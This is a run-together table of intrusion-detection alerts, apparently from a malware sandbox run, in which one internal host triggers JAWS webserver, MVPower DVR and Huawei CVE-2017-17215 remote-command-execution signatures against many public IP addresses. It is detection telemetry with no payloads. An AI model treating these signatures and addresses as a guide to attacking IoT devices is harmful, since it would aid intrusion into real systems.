                                                            192.168.2.2351.89.136.11539608802030092 01/26/24-15:32:18.378722TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3960880192.168.2.2351.89.136.115
                                                            192.168.2.23108.156.62.15748266802025883 01/26/24-15:31:04.249083TCP2025883ET EXPLOIT MVPower DVR Shell UCE4826680192.168.2.23108.156.62.157
                                                            192.168.2.23156.224.143.2355066802030092 01/26/24-15:32:18.476218TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5506680192.168.2.23156.224.143.23
                                                            192.168.2.23151.244.61.7554984802025883 01/26/24-15:32:41.876739TCP2025883ET EXPLOIT MVPower DVR Shell UCE5498480192.168.2.23151.244.61.75
                                                            192.168.2.23171.236.63.23344144802030092 01/26/24-15:31:16.333458TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4414480192.168.2.23171.236.63.233
                                                            192.168.2.23119.3.220.6855482802030092 01/26/24-15:32:38.736141TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5548280192.168.2.23119.3.220.68
                                                            192.168.2.23210.243.112.15758784802030092 01/26/24-15:31:51.438281TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5878480192.168.2.23210.243.112.157
                                                            192.168.2.23182.23.12.2637814802025883 01/26/24-15:32:19.158178TCP2025883ET EXPLOIT MVPower DVR Shell UCE3781480192.168.2.23182.23.12.26
                                                            192.168.2.23223.6.157.951858802025883 01/26/24-15:32:36.362831TCP2025883ET EXPLOIT MVPower DVR Shell UCE5185880192.168.2.23223.6.157.9
                                                            192.168.2.23213.29.44.22540388802025883 01/26/24-15:32:25.756351TCP2025883ET EXPLOIT MVPower DVR Shell UCE4038880192.168.2.23213.29.44.225
                                                            192.168.2.2347.4.208.4636724802025883 01/26/24-15:31:58.730412TCP2025883ET EXPLOIT MVPower DVR Shell UCE3672480192.168.2.2347.4.208.46
                                                            192.168.2.23156.254.95.21547626802030092 01/26/24-15:32:39.717819TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4762680192.168.2.23156.254.95.215
                                                            192.168.2.2323.201.56.17747892802030092 01/26/24-15:33:01.783768TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4789280192.168.2.2323.201.56.177
                                                            192.168.2.2343.248.169.5059858802025883 01/26/24-15:31:50.006489TCP2025883ET EXPLOIT MVPower DVR Shell UCE5985880192.168.2.2343.248.169.50
                                                            192.168.2.2360.43.214.23137832802030092 01/26/24-15:31:51.435831TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3783280192.168.2.2360.43.214.231
                                                            192.168.2.23201.0.234.4241126802030092 01/26/24-15:31:33.229715TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4112680192.168.2.23201.0.234.42
                                                            192.168.2.2365.110.67.446906802025883 01/26/24-15:31:49.655535TCP2025883ET EXPLOIT MVPower DVR Shell UCE4690680192.168.2.2365.110.67.4
                                                            192.168.2.23115.42.222.13148598802030092 01/26/24-15:31:14.039428TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4859880192.168.2.23115.42.222.131
                                                            192.168.2.23162.155.183.19344666802025883 01/26/24-15:32:11.781834TCP2025883ET EXPLOIT MVPower DVR Shell UCE4466680192.168.2.23162.155.183.193
                                                            192.168.2.23210.71.232.17739778802025883 01/26/24-15:31:21.012973TCP2025883ET EXPLOIT MVPower DVR Shell UCE3977880192.168.2.23210.71.232.177
                                                            192.168.2.23128.199.1.7957134802025883 01/26/24-15:32:44.664038TCP2025883ET EXPLOIT MVPower DVR Shell UCE5713480192.168.2.23128.199.1.79
                                                            192.168.2.2320.241.66.6740198802030092 01/26/24-15:32:15.705873TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4019880192.168.2.2320.241.66.67
                                                            192.168.2.2372.21.26.10841576802030092 01/26/24-15:33:00.470464TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4157680192.168.2.2372.21.26.108
                                                            192.168.2.2369.85.94.24653286802030092 01/26/24-15:31:13.711293TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5328680192.168.2.2369.85.94.246
                                                            192.168.2.23120.53.232.13745462802025883 01/26/24-15:32:20.034063TCP2025883ET EXPLOIT MVPower DVR Shell UCE4546280192.168.2.23120.53.232.137
                                                            192.168.2.23149.62.39.12557276802025883 01/26/24-15:32:32.482019TCP2025883ET EXPLOIT MVPower DVR Shell UCE5727680192.168.2.23149.62.39.125
                                                            192.168.2.2334.199.210.5146056802025883 01/26/24-15:31:23.425405TCP2025883ET EXPLOIT MVPower DVR Shell UCE4605680192.168.2.2334.199.210.51
                                                            192.168.2.23119.207.31.17746712802030092 01/26/24-15:31:41.495556TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4671280192.168.2.23119.207.31.177
                                                            192.168.2.2313.91.138.12738430802025883 01/26/24-15:31:49.499486TCP2025883ET EXPLOIT MVPower DVR Shell UCE3843080192.168.2.2313.91.138.127
                                                            192.168.2.23156.254.90.17758848372152829579 01/26/24-15:31:13.283422TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5884837215192.168.2.23156.254.90.177
                                                            192.168.2.23197.246.45.20139650372152835222 01/26/24-15:32:01.755054TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3965037215192.168.2.23197.246.45.201
                                                            192.168.2.23196.50.71.10142210802030092 01/26/24-15:32:25.635896TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4221080192.168.2.23196.50.71.101
                                                            192.168.2.2350.118.154.12242678802030092 01/26/24-15:32:56.776146TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4267880192.168.2.2350.118.154.122
                                                            192.168.2.23194.164.49.7760720802025883 01/26/24-15:32:58.944458TCP2025883ET EXPLOIT MVPower DVR Shell UCE6072080192.168.2.23194.164.49.77
                                                            192.168.2.2347.103.45.3158052802025883 01/26/24-15:32:13.113446TCP2025883ET EXPLOIT MVPower DVR Shell UCE5805280192.168.2.2347.103.45.31
                                                            192.168.2.23103.123.4.8037724802025883 01/26/24-15:31:20.789732TCP2025883ET EXPLOIT MVPower DVR Shell UCE3772480192.168.2.23103.123.4.80
                                                            192.168.2.2331.136.62.4556840802030092 01/26/24-15:31:27.817809TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5684080192.168.2.2331.136.62.45
                                                            192.168.2.2338.53.37.23046536802025883 01/26/24-15:32:47.324847TCP2025883ET EXPLOIT MVPower DVR Shell UCE4653680192.168.2.2338.53.37.230
                                                            192.168.2.23167.114.61.3959674802025883 01/26/24-15:31:12.402679TCP2025883ET EXPLOIT MVPower DVR Shell UCE5967480192.168.2.23167.114.61.39
                                                            192.168.2.23104.77.235.19258712802030092 01/26/24-15:31:41.620325TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5871280192.168.2.23104.77.235.192
                                                            192.168.2.23191.101.131.2144710802030092 01/26/24-15:31:49.579489TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4471080192.168.2.23191.101.131.21
                                                            192.168.2.2323.79.19.10349378802030092 01/26/24-15:31:26.735340TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4937880192.168.2.2323.79.19.103
                                                            192.168.2.23217.92.132.15052322802025883 01/26/24-15:31:37.944780TCP2025883ET EXPLOIT MVPower DVR Shell UCE5232280192.168.2.23217.92.132.150
                                                            192.168.2.2350.228.145.13334136802025883 01/26/24-15:32:35.806433TCP2025883ET EXPLOIT MVPower DVR Shell UCE3413680192.168.2.2350.228.145.133
                                                            192.168.2.2338.47.144.16346026802025883 01/26/24-15:31:52.998716TCP2025883ET EXPLOIT MVPower DVR Shell UCE4602680192.168.2.2338.47.144.163
                                                            192.168.2.235.23.53.20254988802025883 01/26/24-15:31:58.910288TCP2025883ET EXPLOIT MVPower DVR Shell UCE5498880192.168.2.235.23.53.202
                                                            192.168.2.23211.149.134.21350172802030092 01/26/24-15:32:13.187329TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5017280192.168.2.23211.149.134.213
                                                            192.168.2.23116.62.71.21539852802025883 01/26/24-15:32:01.559265TCP2025883ET EXPLOIT MVPower DVR Shell UCE3985280192.168.2.23116.62.71.215
                                                            192.168.2.23164.42.149.25243066802030092 01/26/24-15:32:14.712104TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4306680192.168.2.23164.42.149.252
                                                            192.168.2.23149.12.212.5233460802030092 01/26/24-15:31:35.603929TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3346080192.168.2.23149.12.212.52
                                                            192.168.2.23184.24.189.6247104802030092 01/26/24-15:31:37.924300TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4710480192.168.2.23184.24.189.62
                                                            192.168.2.2313.239.176.6832990802030092 01/26/24-15:31:49.632193TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3299080192.168.2.2313.239.176.68
                                                            192.168.2.23163.15.153.10853606802030092 01/26/24-15:31:53.983415TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5360680192.168.2.23163.15.153.108
                                                            192.168.2.23156.241.74.11249042372152835222 01/26/24-15:31:13.367598TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4904237215192.168.2.23156.241.74.112
                                                            192.168.2.2364.182.87.5945922802030092 01/26/24-15:31:13.719950TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4592280192.168.2.2364.182.87.59
                                                            192.168.2.23102.219.77.14835116802025883 01/26/24-15:32:02.052414TCP2025883ET EXPLOIT MVPower DVR Shell UCE3511680192.168.2.23102.219.77.148
                                                            192.168.2.23163.5.192.9652060802025883 01/26/24-15:32:41.706916TCP2025883ET EXPLOIT MVPower DVR Shell UCE5206080192.168.2.23163.5.192.96
                                                            192.168.2.2365.1.219.12134742802025883 01/26/24-15:32:31.046646TCP2025883ET EXPLOIT MVPower DVR Shell UCE3474280192.168.2.2365.1.219.121
                                                            192.168.2.2323.8.146.16960426802025883 01/26/24-15:31:19.034784TCP2025883ET EXPLOIT MVPower DVR Shell UCE6042680192.168.2.2323.8.146.169
                                                            192.168.2.2374.57.213.2047822802025883 01/26/24-15:32:25.423381TCP2025883ET EXPLOIT MVPower DVR Shell UCE4782280192.168.2.2374.57.213.20
                                                            192.168.2.23173.232.181.21650596802030092 01/26/24-15:32:11.559221TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5059680192.168.2.23173.232.181.216
                                                            192.168.2.23181.117.207.4133702802030092 01/26/24-15:32:42.866946TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3370280192.168.2.23181.117.207.41
                                                            192.168.2.2335.213.160.22451902802030092 01/26/24-15:32:57.098575TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5190280192.168.2.2335.213.160.224
                                                            192.168.2.23208.106.233.17852066802030092 01/26/24-15:31:47.689173TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5206680192.168.2.23208.106.233.178
                                                            192.168.2.2318.235.53.6041494802025883 01/26/24-15:32:06.564301TCP2025883ET EXPLOIT MVPower DVR Shell UCE4149480192.168.2.2318.235.53.60
                                                            192.168.2.23104.17.247.18641598802030092 01/26/24-15:32:11.557512TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4159880192.168.2.23104.17.247.186
                                                            192.168.2.2347.100.202.11756470802025883 01/26/24-15:32:45.243255TCP2025883ET EXPLOIT MVPower DVR Shell UCE5647080192.168.2.2347.100.202.117
                                                            192.168.2.2320.253.71.232906802025883 01/26/24-15:32:49.944359TCP2025883ET EXPLOIT MVPower DVR Shell UCE3290680192.168.2.2320.253.71.2
                                                            192.168.2.2323.192.184.1243988802025883 01/26/24-15:31:55.842282TCP2025883ET EXPLOIT MVPower DVR Shell UCE4398880192.168.2.2323.192.184.12
                                                            192.168.2.23217.73.134.19745198802025883 01/26/24-15:31:04.288934TCP2025883ET EXPLOIT MVPower DVR Shell UCE4519880192.168.2.23217.73.134.197
                                                            192.168.2.2366.45.251.8637802802025883 01/26/24-15:31:36.579696TCP2025883ET EXPLOIT MVPower DVR Shell UCE3780280192.168.2.2366.45.251.86
                                                            192.168.2.23104.116.119.10733370802030092 01/26/24-15:32:18.744839TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3337080192.168.2.23104.116.119.107
                                                            192.168.2.2351.132.35.11638754802025883 01/26/24-15:31:44.773755TCP2025883ET EXPLOIT MVPower DVR Shell UCE3875480192.168.2.2351.132.35.116
                                                            192.168.2.2354.201.62.19056696802030092 01/26/24-15:31:23.776945TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5669680192.168.2.2354.201.62.190
                                                            192.168.2.2323.223.101.13038824802025883 01/26/24-15:32:07.813353TCP2025883ET EXPLOIT MVPower DVR Shell UCE3882480192.168.2.2323.223.101.130
                                                            192.168.2.23130.254.45.11260120802030092 01/26/24-15:31:41.456093TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution6012080192.168.2.23130.254.45.112
                                                            192.168.2.2396.16.22.25458896802025883 01/26/24-15:33:00.563016TCP2025883ET EXPLOIT MVPower DVR Shell UCE5889680192.168.2.2396.16.22.254
                                                            192.168.2.2399.83.214.2360542802030092 01/26/24-15:31:41.398087TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution6054280192.168.2.2399.83.214.23
                                                            192.168.2.23103.21.224.21237054802030092 01/26/24-15:32:07.991335TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3705480192.168.2.23103.21.224.212
                                                            192.168.2.2354.195.88.16833964802025883 01/26/24-15:31:27.050988TCP2025883ET EXPLOIT MVPower DVR Shell UCE3396480192.168.2.2354.195.88.168
                                                            192.168.2.2323.65.32.13337420802025883 01/26/24-15:31:22.785357TCP2025883ET EXPLOIT MVPower DVR Shell UCE3742080192.168.2.2323.65.32.133
                                                            192.168.2.23104.80.232.839126802025883 01/26/24-15:31:55.941031TCP2025883ET EXPLOIT MVPower DVR Shell UCE3912680192.168.2.23104.80.232.8
                                                            192.168.2.2393.213.121.25459160802025883 01/26/24-15:31:04.539128TCP2025883ET EXPLOIT MVPower DVR Shell UCE5916080192.168.2.2393.213.121.254
                                                            192.168.2.2388.157.120.5760410802030092 01/26/24-15:32:23.859066TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution6041080192.168.2.2388.157.120.57
                                                            192.168.2.2387.99.180.17049486802025883 01/26/24-15:32:47.668429TCP2025883ET EXPLOIT MVPower DVR Shell UCE4948680192.168.2.2387.99.180.170
                                                            192.168.2.23104.68.14.17548588802030092 01/26/24-15:32:21.661776TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4858880192.168.2.23104.68.14.175
                                                            192.168.2.23185.232.128.13349740802030092 01/26/24-15:32:01.702135TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4974080192.168.2.23185.232.128.133
                                                            192.168.2.23100.40.152.3447214802030092 01/26/24-15:31:26.761872TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4721480192.168.2.23100.40.152.34
                                                            192.168.2.2323.214.19.21236398802025883 01/26/24-15:32:58.676170TCP2025883ET EXPLOIT MVPower DVR Shell UCE3639880192.168.2.2323.214.19.212
                                                            192.168.2.2323.196.168.19136054802025883 01/26/24-15:32:53.430651TCP2025883ET EXPLOIT MVPower DVR Shell UCE3605480192.168.2.2323.196.168.191
                                                            192.168.2.232.17.206.8348860802025883 01/26/24-15:32:40.082111TCP2025883ET EXPLOIT MVPower DVR Shell UCE4886080192.168.2.232.17.206.83
                                                            192.168.2.2350.19.0.15341852802025883 01/26/24-15:32:35.511583TCP2025883ET EXPLOIT MVPower DVR Shell UCE4185280192.168.2.2350.19.0.153
                                                            192.168.2.2347.246.10.10051578802030092 01/26/24-15:32:18.896072TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5157880192.168.2.2347.246.10.100
                                                            192.168.2.23184.50.79.2339916802030092 01/26/24-15:31:20.743260TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3991680192.168.2.23184.50.79.23
                                                            192.168.2.2323.62.79.23948618802030092 01/26/24-15:32:07.603043TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4861880192.168.2.2323.62.79.239
                                                            192.168.2.23187.192.184.22845648802030092 01/26/24-15:32:06.859488TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4564880192.168.2.23187.192.184.228
                                                            192.168.2.23173.29.24.18733044802030092 01/26/24-15:31:43.748280TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3304480192.168.2.23173.29.24.187
                                                            192.168.2.2352.142.126.8859246802025883 01/26/24-15:31:04.732287TCP2025883ET EXPLOIT MVPower DVR Shell UCE5924680192.168.2.2352.142.126.88
                                                            192.168.2.2352.202.65.12952068802030092 01/26/24-15:31:37.817906TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5206880192.168.2.2352.202.65.129
                                                            192.168.2.2338.53.62.16238764802025883 01/26/24-15:32:58.590976TCP2025883ET EXPLOIT MVPower DVR Shell UCE3876480192.168.2.2338.53.62.162
                                                            192.168.2.23194.65.61.8844156802030092 01/26/24-15:32:18.753122TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4415680192.168.2.23194.65.61.88
                                                            192.168.2.23138.100.217.16252596802030092 01/26/24-15:32:23.783017TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5259680192.168.2.23138.100.217.162
                                                            192.168.2.23156.241.121.1541622372152829579 01/26/24-15:31:47.813013TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4162237215192.168.2.23156.241.121.15
                                                            192.168.2.23122.116.234.20733582802030092 01/26/24-15:31:51.956820TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3358280192.168.2.23122.116.234.207
                                                            192.168.2.23156.47.167.10943070802030092 01/26/24-15:31:58.381828TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4307080192.168.2.23156.47.167.109
                                                            192.168.2.23156.241.113.19652330372152829579 01/26/24-15:31:19.037267TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5233037215192.168.2.23156.241.113.196
                                                            192.168.2.23104.90.119.1242320802030092 01/26/24-15:32:25.639118TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4232080192.168.2.23104.90.119.12
                                                            192.168.2.23108.138.167.14446376802030092 01/26/24-15:31:23.425510TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4637680192.168.2.23108.138.167.144
                                                            192.168.2.2334.111.133.23858894802030092 01/26/24-15:32:56.725398TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5889480192.168.2.2334.111.133.238
                                                            192.168.2.2323.77.215.3955030802030092 01/26/24-15:31:35.402143TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5503080192.168.2.2323.77.215.39
                                                            192.168.2.23111.51.104.23142972802030092 01/26/24-15:32:25.692850TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4297280192.168.2.23111.51.104.231
                                                            192.168.2.23194.53.176.10136592802030092 01/26/24-15:32:25.792214TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3659280192.168.2.23194.53.176.101
                                                            192.168.2.23154.93.247.23160758802030092 01/26/24-15:31:27.233231TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution6075880192.168.2.23154.93.247.231
                                                            192.168.2.23178.128.201.21958508802030092 01/26/24-15:32:47.668263TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5850880192.168.2.23178.128.201.219
                                                            192.168.2.23178.16.125.7852530802030092 01/26/24-15:31:26.836533TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5253080192.168.2.23178.16.125.78
                                                            192.168.2.2335.183.233.14441518802030092 01/26/24-15:32:21.506383TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4151880192.168.2.2335.183.233.144
                                                            192.168.2.2318.66.222.15547870802025883 01/26/24-15:31:41.789331TCP2025883ET EXPLOIT MVPower DVR Shell UCE4787080192.168.2.2318.66.222.155
                                                            192.168.2.2394.120.47.16544676802030092 01/26/24-15:32:46.351289TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4467680192.168.2.2394.120.47.165
                                                            192.168.2.23156.77.134.10758310372152829579 01/26/24-15:31:28.507560TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5831037215192.168.2.23156.77.134.107
                                                            192.168.2.2381.198.251.19750352802030092 01/26/24-15:32:06.972423TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5035280192.168.2.2381.198.251.197
                                                            192.168.2.2345.183.19.21936238802030092 01/26/24-15:32:15.022014TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3623880192.168.2.2345.183.19.219
                                                            192.168.2.2323.42.163.15553414802025883 01/26/24-15:32:42.803741TCP2025883ET EXPLOIT MVPower DVR Shell UCE5341480192.168.2.2323.42.163.155
                                                            192.168.2.2384.104.15.14847840802030092 01/26/24-15:33:01.527808TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4784080192.168.2.2384.104.15.148
                                                            192.168.2.2374.208.140.12337336802025883 01/26/24-15:32:11.570526TCP2025883ET EXPLOIT MVPower DVR Shell UCE3733680192.168.2.2374.208.140.123
                                                            192.168.2.23192.185.224.21638158802025883 01/26/24-15:31:30.592293TCP2025883ET EXPLOIT MVPower DVR Shell UCE3815880192.168.2.23192.185.224.216
                                                            192.168.2.23147.154.142.11933900802030092 01/26/24-15:32:58.863656TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3390080192.168.2.23147.154.142.119
                                                            192.168.2.23104.119.82.8756146802025883 01/26/24-15:31:16.948086TCP2025883ET EXPLOIT MVPower DVR Shell UCE5614680192.168.2.23104.119.82.87
                                                            192.168.2.2318.66.134.20444984802030092 01/26/24-15:31:55.571417TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4498480192.168.2.2318.66.134.204
                                                            192.168.2.2323.220.88.19653468802030092 01/26/24-15:31:55.747068TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5346880192.168.2.2323.220.88.196
                                                            192.168.2.23156.224.12.16259940372152829579 01/26/24-15:33:01.456416TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5994037215192.168.2.23156.224.12.162
                                                            192.168.2.2313.224.63.24341116802030092 01/26/24-15:32:07.797964TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4111680192.168.2.2313.224.63.243
                                                            192.168.2.23184.86.0.8042292802030092 01/26/24-15:31:35.809763TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4229280192.168.2.23184.86.0.80
                                                            192.168.2.23117.180.233.2255668802025883 01/26/24-15:32:25.279506TCP2025883ET EXPLOIT MVPower DVR Shell UCE5566880192.168.2.23117.180.233.22
                                                            192.168.2.2338.238.9.3533144802030092 01/26/24-15:31:17.425409TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3314480192.168.2.2338.238.9.35
                                                            192.168.2.23156.250.15.7359358802030092 01/26/24-15:31:22.634380TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5935880192.168.2.23156.250.15.73
                                                            192.168.2.2354.79.111.1960996802030092 01/26/24-15:32:33.990530TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution6099680192.168.2.2354.79.111.19
                                                            192.168.2.2335.169.65.16252674802030092 01/26/24-15:31:58.502198TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5267480192.168.2.2335.169.65.162
                                                            192.168.2.23103.69.193.7345732802030092 01/26/24-15:32:29.071266TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4573280192.168.2.23103.69.193.73
                                                            192.168.2.2313.35.2.18651384802030092 01/26/24-15:31:30.804139TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5138480192.168.2.2313.35.2.186
                                                            192.168.2.23154.38.87.5660742802025883 01/26/24-15:31:18.937002TCP2025883ET EXPLOIT MVPower DVR Shell UCE6074280192.168.2.23154.38.87.56
                                                            192.168.2.2314.199.230.22159086802030092 01/26/24-15:31:36.005046TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5908680192.168.2.2314.199.230.221
                                                            192.168.2.23134.73.222.13851042802030092 01/26/24-15:31:58.715162TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5104280192.168.2.23134.73.222.138
                                                            192.168.2.23104.16.140.12633278802025883 01/26/24-15:32:18.575264TCP2025883ET EXPLOIT MVPower DVR Shell UCE3327880192.168.2.23104.16.140.126
                                                            192.168.2.2338.38.65.23037578802030092 01/26/24-15:33:00.622420TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3757880192.168.2.2338.38.65.230
                                                            192.168.2.2373.158.248.14835134802030092 01/26/24-15:31:12.643416TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3513480192.168.2.2373.158.248.148
                                                            192.168.2.23196.51.15.16032854802030092 01/26/24-15:32:47.842051TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3285480192.168.2.23196.51.15.160
                                                            192.168.2.23163.5.153.17637304802025883 01/26/24-15:31:15.922580TCP2025883ET EXPLOIT MVPower DVR Shell UCE3730480192.168.2.23163.5.153.176
                                                            192.168.2.23167.82.74.11251752802030092 01/26/24-15:32:04.521738TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5175280192.168.2.23167.82.74.112
                                                            192.168.2.2354.86.197.21752968802030092 01/26/24-15:32:32.488871TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5296880192.168.2.2354.86.197.217
                                                            192.168.2.23162.14.120.4537518802025883 01/26/24-15:31:49.711223TCP2025883ET EXPLOIT MVPower DVR Shell UCE3751880192.168.2.23162.14.120.45
                                                            192.168.2.2388.221.24.1056354802030092 01/26/24-15:31:20.588355TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5635480192.168.2.2388.221.24.10
                                                            192.168.2.23195.22.248.21839446802025883 01/26/24-15:32:28.382250TCP2025883ET EXPLOIT MVPower DVR Shell UCE3944680192.168.2.23195.22.248.218
                                                            192.168.2.2376.164.156.1132940802025883 01/26/24-15:31:01.082396TCP2025883ET EXPLOIT MVPower DVR Shell UCE3294080192.168.2.2376.164.156.11
                                                            192.168.2.2318.165.105.16133670802025883 01/26/24-15:32:01.343654TCP2025883ET EXPLOIT MVPower DVR Shell UCE3367080192.168.2.2318.165.105.161
                                                            192.168.2.23164.92.241.13355232802030092 01/26/24-15:32:09.847930TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5523280192.168.2.23164.92.241.133
                                                            192.168.2.2354.165.187.10039016802025883 01/26/24-15:33:01.778861TCP2025883ET EXPLOIT MVPower DVR Shell UCE3901680192.168.2.2354.165.187.100
                                                            192.168.2.23104.25.138.5739522802025883 01/26/24-15:31:52.670365TCP2025883ET EXPLOIT MVPower DVR Shell UCE3952280192.168.2.23104.25.138.57
                                                            192.168.2.2318.163.142.12346612802030092 01/26/24-15:33:01.661822TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4661280192.168.2.2318.163.142.123
                                                            192.168.2.23190.175.16.10033660802025883 01/26/24-15:32:42.003037TCP2025883ET EXPLOIT MVPower DVR Shell UCE3366080192.168.2.23190.175.16.100
                                                            192.168.2.23198.143.148.255194802030092 01/26/24-15:31:41.508143TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5519480192.168.2.23198.143.148.2
                                                            192.168.2.2383.167.179.936342802025883 01/26/24-15:32:32.574465TCP2025883ET EXPLOIT MVPower DVR Shell UCE3634280192.168.2.2383.167.179.9
                                                            192.168.2.2323.63.87.4949220802030092 01/26/24-15:33:01.955923TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4922080192.168.2.2323.63.87.49
                                                            192.168.2.23120.78.196.16559336802030092 01/26/24-15:31:13.062668TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5933680192.168.2.23120.78.196.165
                                                            192.168.2.2354.243.167.15060322802030092 01/26/24-15:32:15.823027TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution6032280192.168.2.2354.243.167.150
                                                            192.168.2.23193.178.43.2245548802025883 01/26/24-15:32:42.820275TCP2025883ET EXPLOIT MVPower DVR Shell UCE4554880192.168.2.23193.178.43.22
                                                            192.168.2.2323.52.181.2843186802030092 01/26/24-15:31:49.542653TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4318680192.168.2.2323.52.181.28
                                                            192.168.2.2323.13.20.12338938802025883 01/26/24-15:31:26.930377TCP2025883ET EXPLOIT MVPower DVR Shell UCE3893880192.168.2.2323.13.20.123
                                                            192.168.2.2367.225.246.16446820802025883 01/26/24-15:32:30.553241TCP2025883ET EXPLOIT MVPower DVR Shell UCE4682080192.168.2.2367.225.246.164
